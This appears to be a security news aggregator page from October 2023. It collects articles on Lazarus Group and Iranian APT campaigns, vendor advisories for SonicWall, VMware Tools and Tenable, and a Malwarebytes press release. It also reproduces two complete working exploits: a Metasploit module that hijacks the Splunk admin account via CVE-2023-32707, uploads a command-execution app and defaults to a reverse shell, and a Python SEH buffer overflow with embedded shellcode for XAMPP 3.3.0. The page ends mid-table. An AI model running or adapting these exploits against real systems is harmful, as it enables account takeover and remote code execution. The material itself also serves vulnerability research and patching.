The North Korea-aligned Lazarus Group has been attributed as behind a new campaign in which an unnamed software vendor was compromised through the exploitation of known security flaws in another high-profile software.
The attack sequences, according to Kaspersky, culminated in the deployment of malware families such as SIGNBT and LPEClient, a known hacking tool used by the threat actor for

The North Korea-aligned **Lazarus Group** has been attributed as behind a new campaign in which an unnamed software vendor was compromised through the exploitation of known security flaws in another high-profile software.

The attack sequences, according to Kaspersky, culminated in the deployment of malware families such as SIGNBT and LPEClient, a known hacking tool used by the threat actor for victim profiling and payload delivery.

"The adversary demonstrated a high level of sophistication, employing advanced evasion techniques and introducing SIGNBT malware for victim control," security researcher Seongsu Park said. "The SIGNBT malware used in this attack employed a diverse infection chain and sophisticated techniques."

The Russian cybersecurity vendor said the company that developed the exploited software had been a victim of a Lazarus attack several times, indicating an attempt to steal source code or poison the software supply chain, as in the case of the 3CX supply chain attack.

The Lazarus Group "continued to exploit vulnerabilities in the company's software while targeting other software makers," Park added. As part of the latest activity, a number of victims are said to have been singled out as of mid-July 2023.

The victims, per the company, were targeted through a legitimate security software designed to encrypt web communications using digital certificates. The name of the software was not disclosed and the exact mechanism by which the software was weaponized to distribute SIGNBT remains unknown.

Besides relying on various tactics to establish and maintain persistence on compromised systems, the attack chains employ an in-memory loader that acts as a conduit to launch the SIGNBT malware.

The main function of SIGNBT is to establish contact with a remote server and retrieve further commands for execution on the infected host. The malware is so named for its use of distinctive strings that are prefixed with "SIGNBT" in its HTTP-based command-and-control (C2) communications -

*   SIGNBTLG, for initial connection
*   SIGNBTKE, for gathering system metadata upon receiving a SUCCESS message from the C2 server
*   SIGNBTGC, for fetching commands
*   SIGNBTFI, for communication failure
*   SIGNBTSR, for a successful communication

The Windows backdoor, for its part, is armed with a wide range of capabilities to exert control over the victim's system. This includes process enumeration, file and directory operations, and the deployment of payloads such as LPEClient and other credential-dumping utilities.

Kaspersky said it identified at least three disparate Lazarus campaigns in 2023 using varied intrusion vectors and infection procedures, but consistently relied on LPEClient malware to deliver the final-stage malware.

One such campaign paved the way for an implant codenamed Gopuram, which was used in cyber assaults targeting cryptocurrency companies by leveraging a trojanized version of the 3CX voice and video conferencing software.

The latest findings are just the latest example of North Korean-linked cyber operations, in addition to being a testament to the Lazarus Group's ever-evolving and ever-expanding arsenal of tools, tactics, and techniques.

"The Lazarus Group remains a highly active and versatile threat actor in today's cybersecurity landscape," Park said.

"The threat actor has demonstrated a profound understanding of IT environments, refining their tactics to include exploiting vulnerabilities in high-profile software. This approach allows them to efficiently spread their malware once initial infections are achieved."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

N. Korean Lazarus Group Targets Software Vendor Using Known Flaws

Splunk suffers from an issue where a low-privileged user who holds a role that has the edit_user capability assigned to it can escalate their privileges to that of the admin user by providing a specially crafted web request. This is because the edit_user capability does not honor the grantableRoles setting in the authorize.conf configuration file, which prevents this scenario from happening. This exploit abuses this vulnerability to change the admin password and login with it to upload a malicious app achieving remote code execution.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  attr_accessor :cookie  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Splunk "edit_user" Capability Privilege Escalation',        'Description' => %q{          A low-privileged user who holds a role that has the "edit_user" capability assigned to it          can escalate their privileges to that of the admin user by providing a specially crafted web request.          This is because the "edit_user" capability does not honor the "grantableRoles" setting in the authorize.conf          configuration file, which prevents this scenario from happening.          This exploit abuses this vulnerability to change the admin password and login with it to upload a malicious app achieving RCE.        },        'Author' => [          'Mr Hack (try_to_hack) Santiago Lopez', # discovery          'Heyder Andrade', # metasploit module          'Redway Security <redwaysecurity.com>' # Writeup and PoC        ],        'License' => MSF_LICENSE,        'References' => [          [ 'CVE', '2023-32707' ],          [ 'URL', 'https://advisory.splunk.com/advisories/SVD-2023-0602' ], # Vendor Advisory          [ 'URL', 'https://blog.redwaysecurity.com/2023/09/exploit-cve-2023-32707.html' ], # Writeup          [ 'URL', 'https://github.com/redwaysecurity/CVEs/tree/main/CVE-2023-32707' ] # PoC        ],        'Payload' => {          'Space' => 1024,          'DisableNops' => true        },        'Platform' => %w[linux unix win osx],        'Targets' => [          [            'Splunk < 9.0.5, 8.2.11, and 8.1.14 / Linux',            {              'Arch' => ARCH_CMD,              'Platform' => %w[linux unix],              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_python',                # just to avoid the error because of the clean up: 'error retrieving current directory: getcwd: cannot access parent directories:'                'AutoRunScript' => 'post/multi/general/execute COMMAND=cd $SPLUNK_HOME'              }            }          ],          [            'Splunk < 9.0.5, 8.2.11, and 8.1.14 / Windows',            {              'Arch' => ARCH_CMD,              'Platform' => 'win',              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/adduser' }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 8000,          'SSL' => true        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [            IOC_IN_LOGS, # requests are logged in the _audit index            # ARTIFACTS_ON_DISK # app is removed in the cleanup method          ]        },        'DisclosureDate' => '2023-06-01'      )    )    register_options(      [        OptString.new('USERNAME', [true, 'The username with "edit_user" role to authenticate as']),        OptString.new('PASSWORD', [true, 'The password for the specified username']),        OptString.new('TARGET_USER', [true, 'The username to change the password for (default: admin)', 'admin']),        OptString.new('TARGET_PASSWORD', [false, 'The new password to set for the admin user (default: random)', Rex::Text.rand_text_alpha(rand(8..12))]),        OptString.new('APP_NAME', [false, 'The name of the app to upload (default: random)', Faker::App.name.downcase.gsub(/(\s|-|_){1,}/, '')])      ]    )    # That depends on finding a strategy to distinguish commands that return output and commands that don't    # register_advanced_options(    #   [    #     OptBool.new('ReturnOutput', [ true, 'Display command output', false ])    #   ]    # )  end  def check    splunk_login(datastore['USERNAME'], datastore['PASSWORD'])    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, '/en-US/splunkd/__raw/services/authentication/users/', datastore['USERNAME']),      'method' => 'GET',      'cookie' => cookie,      'vars_get' => {        'output_mode' => 'json'      }    })    return CheckCode::Unknown('Could not detect the version.') unless res&.code == 200    body = res.get_json_document    version = Rex::Version.new(body['generator']['version'])    return CheckCode::Safe("Detected Splunk version #{version} which is not vulnerable") unless (      (Rex::Version.new('9.0.0') <= version && version < Rex::Version.new('9.0.5')) ||      (Rex::Version.new('8.2.0') <= version && version < Rex::Version.new('8.2.11')) ||      (Rex::Version.new('8.1.0') <= version && version < Rex::Version.new('8.1.14'))    )    print_status("Detected Splunk version #{version} which is vulnerable")    capabilities = body['entry'].first['content']['capabilities']    return CheckCode::Safe("User '#{datastore['USERNAME']}' does not have 'edit_user' capability") unless capabilities.include? 'edit_user'    report_vuln(      host: rhost,      name: name,      refs: references,      info: [version]    )    CheckCode::Vulnerable("User '#{datastore['USERNAME']}' has 'edit_user' capability")  end  def app_name    datastore['APP_NAME']  end  # The cleanup method is removing the app before the session is closed and it is broking the session.  #  def cleanup    return unless session_created?    super    # Destroy job    vprint_status("Cleaning up: destroying job #{@job_id}")    send_request_cgi({      'uri' => normalize_uri('/en-US/splunkd/__raw/services/search/jobs/', job_id),      'method' => 'DELETE',      'cookie' => cookie    })    # Remove app    vprint_status("Cleaning up: removing app #{app_name}")    execute_command("bash -c 'rm -rf $SPLUNK_HOME/etc/apps/#{app_name}'")    send_request_cgi({      'uri' => normalize_uri(target_uri.path, '/en-US/debug/refresh'),      'method' => 'POST',      'cookie' => cookie,      'vars_post' => {        'splunk_form_key' => cookies_hash['splunkweb_csrf_token_8000']      }    })  end  def exploit    splunk_change_password(datastore['TARGET_USER'], datastore['TARGET_PASSWORD'])    splunk_login(datastore['TARGET_USER'], datastore['TARGET_PASSWORD'])    splunk_upload_app(app_name, datastore['SPLUNK_APP_FILE'])    @job_id = execute_command(payload.encoded, { app_name: app_name })    # TODO: distinguish commands that return output and commands that don't    # fail_with(Failure::ConfigError, 'The payload returns output. Consider to set ReturnOutput to true') if payload.encoded.include? 'return output' && !datastore['ReturnOutput']    # if datastore['ReturnOutput']    #   print_status('Waiting for command output')    #   print_line(splunk_fetch_job_output)    # end  end  def execute_command(cmd, opts = {})    res = send_request_cgi({      'uri' => '/en-US/api/search/jobs',      'method' => 'POST',      'cookie' => cookie,      'headers' =>        {          'X-Requested-With' => 'XMLHttpRequest',          'X-Splunk-Form-Key' => cookies_hash['splunkweb_csrf_token_8000']        },      'vars_post' =>        {          'auto_cancel' => '62',          'status_buckets' => '300',          'output_mode' => 'json',          'search' => "|  #{app_name} #{Rex::Text.encode_base64(cmd)}",          'earliest_time' => '-1@h',          'latest_time' => 'now',          'ui_dispatch_app' => (opts[:app_name]).to_s        }    })    fail_with(Failure::UnexpectedReply, "Unable to execute command. Unexpected reply (HTTP #{res.code})") unless res&.code == 200    body = res.get_json_document    fail_with(Failure::UnexpectedReply, 'Unable to get JOB ID of the command') unless body['data']    body['data']  end  def splunk_helper_extract_token(uri)    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, uri),      'method' => 'GET',      'keep_cookies' => true    })    fail_with(Failure::Unreachable, 'Unable to get token') unless res&.code == 200    "session_id_8000=#{rand_text_numeric(40)}; " << res.get_cookies  end  def splunk_login(username, password)    # gets cval and splunkweb_uid cookies    self.cookie = splunk_helper_extract_token('/en-US/account/login')    # login post, should get back the splunkd_8000 and splunkweb_csrf_token_8000 cookies    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, '/en-US/account/login'),      'method' => 'POST',      'cookie' => cookie,      'vars_post' =>        {          'username' => username,          'password' => password,          'cval' => cookies_hash['cval']        }    })    fail_with(Failure::UnexpectedReply, 'Unable to login') unless res&.code == 200    cookie << " #{res.get_cookies}"  end  def splunk_change_password(username, password)    # due to the AutoCheck mixin and the keep_cookies option, the cookie might be already set    do_login(username, password) unless cookie    print_status("Changing '#{username}' password to #{password}")    res = send_request_cgi({      'uri' => normalize_uri('/en-US/splunkd/__raw/services/authentication/users/', username),      'method' => 'POST',      'headers' => {        'X-Splunk-Form-Key' => cookies_hash['splunkweb_csrf_token_8000'],        'X-Requested-With' => 'XMLHttpRequest'      },      'cookie' => cookie,      'vars_post' => {        'output_mode' => 'json',        'password' => password,        'force-change-pass' => 0,        'locked-out' => 0      }    })    fail_with(Failure::UnexpectedReply, "Unable to change #{username}'s password.") unless res&.code == 200    print_good("Password of the user '#{username}' has been changed to #{password}")    body = res.get_json_document    capabilities = body['entry'].first['content']['capabilities']    fail_with(Failure::BadConfig, "The user '#{username}' does not have 'install_app' capability. You may consider to target other user") unless capabilities.include? 'install_apps'  end  def splunk_upload_app(app_name, _file_name)    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, '/en-US/manager/appinstall/_upload'),      'method' => 'GET',      'cookie' => cookie    })    fail_with(Failure::UnexpectedReply, 'Unable to get form state') unless res&.code == 200    html = res.get_html_document    print_status("Uploading file #{app_name}")    data = Rex::MIME::Message.new    # fill the hidden fields from the form: state and splunk_form_key    html.at('[id="installform"]').elements.each do |form|      next unless form.attributes['value']      data.add_part(form.attributes['value'].to_s, nil, nil, "form-data; name=\"#{form.attributes['name']}\"")    end    data.add_part('1', nil, nil, 'form-data; name="force"')    data.add_part(splunk_app, 'application/gzip', 'binary', "form-data; name=\"appfile\"; filename=\"#{app_name}.tar.gz\"")    post_data = data.to_s    res = send_request_cgi({      'uri' => '/en-US/manager/appinstall/_upload',      'method' => 'POST',      'cookie' => cookie,      'ctype' => "multipart/form-data; boundary=#{data.bound}",      'data' => post_data    })    fail_with(Failure::Unknown, 'Error uploading App') unless (res&.code == 303 || (res.code == 200 && res.body !~ /There was an error processing the upload/))    print_good("#{app_name} successfully uploaded")  end  # def splunk_fetch_job_output  #   res = send_request_cgi({  #     'uri' => normalize_uri(target_uri.path, "/en-US/splunkd/__raw/servicesNS/#{datastore['TARGET_USER']}/#{app_name}/search/jobs/#{@job_id}/results"),  #     'method' => 'GET',  #     'keep_cookies' => true,  #     'cookie' => cookie,  #     'vars_get' => {  #       'output_mode' => 'json'  #     }  #   })  #   fail_with(Failure::UnexpectedReply, "Unable to get JOB results. Unexpected reply (HTTP #{res.code})") unless res&.code == 200  #   body = res.get_json_document  #   fail_with(Failure::UnexpectedReply, "Splunk reply: #{body['messages'].collect { |h| h['text'] if h['type'] == 'ERROR' }.join('\n')}") if body['results'].empty?  #   Rex::Text.decode_base64(body['results'].first['result'])  # end  def splunk_app    # metadata folder    metadata = <<~EOF      [commands]      export = system    EOF    # default folder    commands_conf = <<~EOF      [#{app_name}]      type = python      filename = #{app_name}.py      local = false      enableheader = false      streaming = false      perf_warn_limit = 0    EOF    app_conf = <<~EOF      [launcher]      author=#{Faker::Name.name}      description=#{Faker::Lorem.sentence}      version=#{Faker::App.version}      [ui]      is_visible = false    EOF    # bin folder    msf_exec_py = <<~EOF      import sys, base64, subprocess      import splunk.Intersplunk      header = ['result']      results = []      try:        proc = subprocess.Popen(['/bin/bash', '-c', base64.b64decode(sys.argv[1]).decode()], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)        output = proc.stdout.read().decode('utf-8')        results.append({'result': base64.b64encode(output.encode('utf-8')).decode('utf-8')})      except Exception as e:        error_msg = f'Error : {str(e)} '        results = splunk.Intersplunk.generateErrorResults(error_msg)      splunk.Intersplunk.outputResults(results, fields=header)    EOF    tarfile = StringIO.new    Rex::Tar::Writer.new tarfile do |tar|      tar.add_file("#{app_name}/metadata/default.meta", 0o644) do |io|        io.write metadata      end      tar.add_file("#{app_name}/default/commands.conf", 0o644) do |io|        io.write commands_conf      end      tar.add_file("#{app_name}/default/app.conf", 0o644) do |io|        io.write app_conf      end      tar.add_file("#{app_name}/bin/#{app_name}.py", 0o644) do |io|        io.write msf_exec_py      end    end    tarfile.rewind    tarfile.close    Rex::Text.gzip(tarfile.string)  end  def cookies_hash    cookie.split(';').each_with_object({}) { |name, h| h[name.split('=').first.strip] = name.split('=').last.strip }  endend

Splunk edit_user Capability Privilege Escalation

XAMPP version 3.3.0 .ini unicode + SEH buffer overflow exploit.

# Exploit Title: XAMPP v3.3.0 — '.ini' Buffer Overflow (Unicode + SEH)  
# Date: 2023-10-26  
# Author: Talson (@Ripp3rdoc)  
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.0.28/xampp-windows-x64-8.0.28-0-VS16-installer.exe  
# Version: 3.3.0  
# Tested on: Windows 11  
# CVE-2023-46517

##########################################################  
# _________ _______  _        _______  _______  _        #  
# \__   __/(  ___  )( \      (  ____ $  ___  )( (    /| #  
#    ) (   | (   ) || (      | (    \/| (   ) ||  \  ( | #  
#    | |   | (___) || |      | (_____ | |   | ||   \ | | #  
#    | |   |  ___  || |      (_____  )| |   | || (\ $ | #  
#    | |   | (   ) || |            ) || |   | || | \   | #  
#    | |   | )   ( || (____/\/\____) || (___) || )  \  | #  
#    )_(   |/     \|(_______/\_______)(_______)|/    )_) #  
#                                                        #  
##########################################################

# Proof of Concept:

# 1.- Run the python script "poc.py", it will create a new file "xampp-control.ini"  
# 2.- Open the application (xampp-control.exe)  
# 3.- Click on the "admin" button in front of Apache service.  
# 4.- Profit

# Proof-of-Concept code on GitHub: https://github.com/ripp3rdoc/XAMPPv3.3.0-BOF/

# Greetingz to EMU TEAM (¬‿¬)⩙

from pwn import *  
import shutil  
import os.path

buffer      =   "\x41" * 268        # 268 bytes to fill the buffer  
nseh        =   "\x59\x71"          # next SEH address  — 0x00590071 (a harmless padding)  
seh         =   "\x15\x43"          # SEH handler       — 0x00430015: pop ecx ; pop ebp ; ret ;  
padd        =   "\x71" * 0x55       # padding

eax_align =     "\x47"         # venetian pad/align  
eax_align +=    "\x51"          # push ecx  
eax_align +=    "\x71"         # venetian pad/align  
eax_align +=    "\x58"        # pop eax               -> eax = 0019e1a0  
eax_align +=    "\x71"         # venetian pad/align   
eax_align +=    "\x05\x24\x11"  # add eax,0x11002300  
eax_align +=    "\x71"         # venetian pad/align  
eax_align +=    "\x2d\x11\x11"  # sub eax,0x11001100    -> eax = 0019F3DC  
eax_align +=    "\x71"         # venetian pad/align  
eax_align +=    "\x50"         # push eax   
eax_align +=    "\x71"        # pad to align the following ret  
eax_align +=    "\xc3";        # ret into eax?

# msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_mixed -f raw EXITFUNC=thread BufferRegister=EAX -o shellcode.bin  
# Payload size: 512 bytes  
shellcode = (  
    "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1"  
    "AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBkLzHrbM0ipm0c0bi7u01Ep1TBkb0nPdKR2zlrknrKdDK42Kx"  
    "Jo6WpJnFLqiofLMl1QallBLlO0gQxOzmjagW7rZRObpWBkNrZpdKMzmlBkNlzq1hZC0HKQwab1dKQIKp9qiCrk"  
    "myKhGslzoYtKMdTKkQJ6ma9odlgQ8OJmM1vg08iPD5yfjcSMjXOKQmnDRUhdaH4KR8mTIq7c2FDKjlpKrkaHML"  
    "JaZ3dKItrkYqhPU9MtO4KtOk1KC1QI1JNqKO9P1OOoqJtKn2HkRmOmaZjatMbe7BYpm0kPR0PhmadKRODGioj57"  
    "KgpmMnJZjoxDfceemCmYo9EmlivcL9zE0ikWpQe9ugKoWKcprpo2Jip23KOHUQSaQ0l33Lns5PxrEKPAA"  
    )

shellcode = buffer + nseh + seh +  eax_align + padd + shellcode

check_file = os.path.isfile("c:\\xampp\\xampp-control.ini")

if check_file:

        print("[!] Backup file found. Generating the POC file...")  
    pass  
else:    
    # create backup  
    try:  
        shutil.copyfile("c:\\xampp\\xampp-control.ini", "c:\\xampp\\xampp-control.ini.bak")  
        print("[+] Creating backup for xampp-control.ini...")  
        print("[+] Backup file created!")  
    except Exception as e:  
        print("[!] Failed creating a backup for xampp-control.ini: ", e)

try:

        # Create the new file  
    with open("c:\\xampp\\xampp-control.ini", "w", encoding='utf-8') as file:  
        file.write(f"""[Common]  
    Edition=  
    Editor=  
    Browser={shellcode}

    Debug=0  
    Debuglevel=0  
    Language=en  
    TomcatVisible=1  
    Minimized=0

    [LogSettings]  
    Font=Arial  
    FontSize=10

    [WindowSettings]  
    Left=-1  
    Top=-1  
    Width=682  
    Height=441

    [Autostart]  
    Apache=0  
    MySQL=0  
    FileZilla=0  
    Mercury=0  
    Tomcat=0

    [Checks]  
    CheckRuntimes=1  
    CheckDefaultPorts=1

    [ModuleNames]  
    Apache=Apache  
    MySQL=MySQL  
    Mercury=Mercury  
    Tomcat=Tomcat

    [EnableModules]  
    Apache=1  
    MySQL=1  
    FileZilla=1  
    Mercury=1  
    Tomcat=1

    [EnableServices]  
    Apache=1  
    MySQL=1  
    FileZilla=1  
    Tomcat=1

    [BinaryNames]  
    Apache=httpd.exe  
    MySQL=mysqld.exe  
    FileZilla=filezillaserver.exe  
    FileZillaAdmin=filezilla server interface.exe  
    Mercury=mercury.exe  
    Tomcat=tomcat8.exe

    [ServiceNames]  
    Apache=Apache2.4  
    MySQL=mysql  
    FileZilla=FileZillaServer  
    Tomcat=Tomcat  
    [ServicePorts]  
    Apache=80  
    ApacheSSL=443  
    MySQL=3306  
    FileZilla=21  
    FileZill=14147  
    Mercury1=25  
    Mercury2=79  
    Mercury3=105  
    Mercury4=106  
    Mercury5=110  
    Mercury6=143  
    Mercury7=2224  
    TomcatHTTP=8080  
    TomcatAJP=8009  
    Tomcat=8005  
    [UserConfigs]  
    Apache=   
    MySQL=  
    FileZilla=  
    Mercury=  
    Tomcat=

    [UserLogs]  
    Apache=  
    MySQL=  
    FileZilla=  
    Mercury=  
    Tomcat=  
    """)  
    print("[+] Created the POC!")

except Exception as e:  
    print("[!] Failed creating the POC xampp-control.ini: ", e)

XAMPP 3.3.0 Buffer Overflow

SonicWall NetExtender Windows (32-bit and 64-bit) client 10.2.336 and earlier versions have a DLL Search Order Hijacking vulnerability in the start-up DLL component. Successful exploitation via a local attacker could result in command execution in the target system.

CVE-2023-44220

A local privilege escalation vulnerability in SonicWall Directory Services Connector Windows MSI client 4.1.21 and earlier versions allows a local low-privileged user to gain system privileges through running the recovery feature.

CVE-2023-44219

open-vm-tools contains a file descriptor hijack vulnerability in the vmware-user-suid-wrapper. A malicious actor with non-root privileges may be able to hijack the 
/dev/uinput file descriptor allowing them to simulate user inputs.

Advisory ID: VMSA-2023-0024

CVSSv3 Range: 7.5 - 7.8

Issue Date: 2023-10-26

Updated On: 2023-10-26 (Initial Advisory)

CVE(s): CVE-2023-34057, CVE-2023-34058

Synopsis: VMware Tools updates address Local Privilege Escalation and SAML Token Signature Bypass vulnerabilities (CVE-2023-34057, CVE-2023-34058)

****1\. Impacted Products****

*   VMware Tools

****2\. Introduction****

Multiple vulnerabilities in VMware Tools were responsibly reported to VMware. Updates are available to remediate these vulnerabilities in affected VMware products.

****3a. Local privilege escalation vulnerability in VMware Tools (macOS) (CVE-2023-34057)****

VMware Tools contains a local privilege escalation vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.8.

A malicious actor with local user access to a guest virtual machine may elevate privileges within the virtual machine.

To remediate CVE-2023-34057 apply the patches listed in the 'Fixed Version' column of the 'Response Matrix' found below.

VMware would like to thank Dan Revah of Google for reporting this issue to us.

****3b. SAML Token Signature Bypass vulnerability in VMware Tools (CVE-2023-34058)****

VMware Tools contains a SAML token signature bypass vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.5.

A malicious actor that has been granted Guest Operation Privileges in a target virtual machine may be able to elevate their privileges if that target virtual machine has been assigned a more privileged Guest Alias.

To remediate CVE-2023-34058 apply the patches listed in the 'Fixed Version' column of the 'Response Matrix' found below.

*   While the description and known attack vectors are very similar to CVE-2023-20900, CVE-2023-34058 has a different root cause that has now been addressed.
*   CVE-2023-34058 also impacts open-vm-tools. Fixes have been provided to the Linux community for distribution.

Product

Version

Running On

CVE Identifier

CVSSv3

Severity

Fixed Version

Workarounds

Additional Documentation

VMware Tools

12.x.x, 11.x.x, 10.3.x

macOS

CVE-2023-34057

7.8

important

12.1.1

None

None

VMware Tools

12.x.x, 11.x.x, 10.3.x

Windows

CVE-2023-34057

N/A

N/A

Unaffected

N/A

N/A

VMware Tools

12.x.x, 11.x.x, 10.3.x

macOS

CVE-2023-34058

N/A

N/A

Unaffected

N/A

N/A

VMware Tools

12.x.x, 11.x.x, 10.3.x

Windows

CVE-2023-34058

7.5

important

12.3.5

None

None

****4\. References****

****5\. Change Log****

**2023-10-26 VMSA-2023-0024  
**Initial security advisory.

****6\. Contact****

CVE-2023-34059: VMSA-2023-0024

**PRESS RELEASE**

**SANTA CLARA, Calif.,Oct. 25, 2023/PRNewswire/ --** Malwarebytes, a global leader in real-time cyber protection, today launched an essential new consumer solution, Identity Theft Protection. The new service helps individuals secure their digital identities and defend against identity and online threats. Malwarebytes Identity Theft Protection includes real-time identity monitoring and alerts, robust credit protection and reporting and live agent-supported identity recovery and resolution services – backed by up to a $2 million identity theft insurance policy. The new service, paired with Malwarebytes' award-winning antivirus and VPN software, helps prevent criminals from stealing or using personal information to drain financial accounts, hack or impersonate social media accounts, damage a user's reputation or other online and identity-based attacks.

Today's digital life is complex and sometimes deceptive. According to new research from Malwarebytes, identity theft ranks as people's third biggest concern when it comes to online security, just behind fear of financial accounts and personal data being breached – both of which play into identity theft. Of those surveyed 64% agree that identity theft protection is important, but only 13% have it. Consumers are also increasingly fearful of new technology. Malwarebytes gives consumers protection they can trust, alerting them when we see their information has been stolen and providing live agent support to restore their identity and replace lost items.

"Even as we spend more and more of our lives online, we all know that the internet today can't be trusted," said Mark Beare, GM of Consumer Business Unit, Malwarebytes. "Consumers need a tool that not only blocks threats like malware and phishing, but that also monitors and protects their digital identity, be that social media profiles, bank accounts or email. With Malwarebytes Identity Theft Protection, we provide a robust and exhaustive suite of services so individuals and families can rest easy knowing that we are actively working to keep them safe and protect their digital identity."

Malwarebytes Identity Theft Protection is available globally through a variety of tiered offerings that provide protection via computers and mobile devices across multiple operating systems including Windows, macOS, Android and iOS.

**Key features include:**

*   Identity Monitoring & Alerts**:** Continuously scours a multitude of websites and data sources, including the Dark Web, to alert if personal information is being illegally traded or sold. Recommends actions to take to protect yourself.
*   Credit Monitoring and Protection**:** Ongoing tracking of credit for critical changes, such as new accounts or inquiries and applications for new lines of credit. A credit freeze also can be activated\*.
*   Breach IQ**:** Provides a safety score and alerts if personal information is part of a known breach\*.
*   Identity Recovery & Resolution**:** Assistance in the event of an identity theft incident, including guided steps to report the crime, dispute fraudulent charges, restore identity and recuperate financial losses incurred. Includes up to a $2 million insurance policy.

To read more about the latest threats and cyber protection strategies, visit our blog, or follow us on Facebook, Instagram, LinkedIn, TikTok and Twitter.

_\*U.S. only_

**About Malwarebytes**

Malwarebytes believes that when people and organizations are free from threats, they are free to thrive. Founded in 2008, Malwarebytes CEO Marcin Kleczynski had one mission: to rid the world of malware. Today, Malwarebytes' award-winning endpoint protection, privacy and threat prevention solutions along with a world-class team of threat researchers protect millions of individuals and thousands of businesses across the globe daily. Malwarebytes solutions are consistently recognized by independent tests including AVLAB and AV-TEST. The company is headquartered in California with offices in Europe and Asia. For more information and career opportunities, visit https://www.malwarebytes.com.

Malwarebytes Announces Consumer Identity Theft Protection Solution

An issue in Mintty v.3.6.4 and before allows a remote attacker to execute arbitrary code via crafted commands to the terminal.

CVE-2023-39726: "[31m"?! ANSI Terminal security in 2023 and finding 10 CVEs

Nation-state hackers are using hybrids to ensnare those in the maritime, shipping, and logistics industries.

A threat actor sponsored by the Islamic Republic of Iran has been using watering-hole attacks, with a new malware downloader and a budding new method of infection, against Mediterranean organizations involved in the maritime, shipping, and logistics sectors.

These latest tactics and tools represent in some ways a continuation, and in other ways an evolution, for the group variously known as Tortoiseshell, Imperial Kitten, TA456, Crimson Sandstorm, and Yellow Liderc, according to a blog post this week from PricewaterhouseCoopers. The Islamic Revolutionary Guard Corps-backed threat actor has previously been recorded using watering holes, phishing domains, highly targeted emails, fake social media accounts, and more, in its globe-spanning espionage campaigns.

**Yellow Liderc's Latest Campaign**

Since 2022, Yellow Liderc has been compromising legitimate websites and using them to insert malicious JavaScript. The JavaScript fingerprints unwitting visitors, capturing details such as their location, device, time of visit, and so on. If a visitor matches a specific profile — in this case, entities along the Mediterranean associated with maritime, logistics, and shipping — they will be served further malware.

The malware in question is "IMAPLoader," a dynamic link library (DLL) written in .NET, which uses email as a means of command-and-control (C2) communication.

This new sample is in most ways similar in function to Yellow Liderc's previous loaders. It distinguishes itself, however, in its advanced method of infection: a technique known as "appdomain manager injection." First demonstrated by a proof-of-concept (PoC) called "GhostLoader" in 2020, hackers or red teamers can use it to circumvent tools designed to detect a DLL or executable being loaded onto a Windows machine.

After slyly injecting itself on a host computer deemed of high value, IMAPLoader communicates with the attackers' Russian-hosted, very American-sounding email addresses — leviblum\[@\]yandex.com and brodyheywood\[@\]yandex — where further payloads lie.

**Yellow Liderc's Tactics and Targets Vary**

Anyone who tries to defend against Yellow Liderc simply by accounting for this method of injection, or this malware, will end up falling short. The group has been known to cycle through and combine various tactics, techniques, and procedures over the years.

"What we've seen more often and most recently is reconnaissance emails," says Joshua Miller, senior threat researcher at Proofpoint. Since 2021, he says, it has used the open source red-team tool GoPhish to insert malicious links into fake newsletters impersonating legitimate organizations. But it's also got more, weirder strategies in its arsenal. In 2021, Proofpoint described an elaborate, yearslong ruse they ran, posing as a woman named Marcella Flores, in order to phish a specific employee at an aerospace company.

Recently, Proofpoint observed a unique cluster within the same APT targeting workers and organizations in the healthcare, technology, and the nuclear division of a European energy company. According to PwC, it remains an ongoing threat not just to all of these industries and regions thus far named, but also the automotive, defense, and IT industries, in places as far and wide as the Middle East, South Asia, and North and South America.

Perhaps the only consistent elements of a Yellow Liderc attack are the minor discrepancies between the email sender, newsletter, or website one expects, and the actual sender or experience they're delivered.

"Look for any unusual network traffic," Miller advises, and pay attention to suspicious emails. "Checking who's sending an email is important. I know that we say that all the time, but it's true and important for this sort of case."

Iran APT Targets the Mediterranean With Watering-Hole Attacks


Under certain conditions, Nessus Network Monitor could allow a low privileged user to escalate privileges to NT AUTHORITY\SYSTEM on Windows hosts by replacing a specially crafted file.

_This page contains information regarding security vulnerabilities that may impact Tenable's products. This may include issues specific to our software, or due to the use of third-party libraries within our software. Tenable strongly encourages users to ensure that they upgrade or apply relevant patches in a timely manner._

_Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order._

_For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page._

_If you have questions or corrections about this advisory, please email \[email protected\]_

Tenable Advisory ID

TNS-2023-34

Credit

Will Dormann - CVE-2023-5622 / CVE-2023-5623

CVSSv3 Base / Temporal Score

7.1 / 6.4 (CVE-2023-5622)

7.0 / 6.3 (CVE-2023-5623)

7.2 / 6.5 (CVE-2023-5624)

6.1 / 5.3 (CVE-2018-25050)

6.1 / 5.5 (CVE-2021-23445)

5.3 / 4.6 (CVE-2023-0465)

5.3 / 4.6 (CVE-2023-0466)

5.9 / 5.2 (CVE-2023-1255)

5.3 / 4.6 (CVE-2023-2650)

5.3 / 4.6 (CVE-2023-3817)

5.3 / 4.6 (CVE-2023-3446)

7.5 / 6.7 (CVE-2023-38039)

7.8 / 6.8 (CVE-2023-4807)

CVSSv3 Vector

